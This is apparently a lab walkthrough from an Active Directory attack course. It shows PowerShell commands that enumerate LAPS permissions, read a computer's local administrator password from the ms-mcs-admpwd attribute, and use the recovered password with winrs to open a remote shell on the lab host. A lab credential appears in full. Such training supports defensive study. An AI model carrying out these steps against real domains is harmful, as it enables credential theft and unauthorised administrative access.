- Identify OUs where LAPS is in use and user(s) who have permission to read passwords.
- Abuse the permissions to get the clear text password(s).
First import AD Module:
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll; Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
Import Get-LapsPermission.ps1
as well:
. C:\AD\Tools\Get-LapsPermission.ps1
has the LDAPS Read permission on the OUMailMgmt
Check the computers in the Mgmt
Get-ADComputer -Filter * | ? { $_.DistinguishedName -match "MailMgmt" }
- Computer:
Since the current user studentuser64
is in the group US\studentusers
, we can use AD Module to read the LAPS:
Get-ADComputer -Identity US-MailMgmt -Properties ms-mcs-admpwd | Select -ExpandProperty ms-mcs-admpwd
- The cleartext password in LAPS is
Try to access using the local admin password found:
winrs -r:us-mailmgmt.us.techcorp.local -u:.\administrator -p:"03/%Bg}o&4fGEz" cmd.exe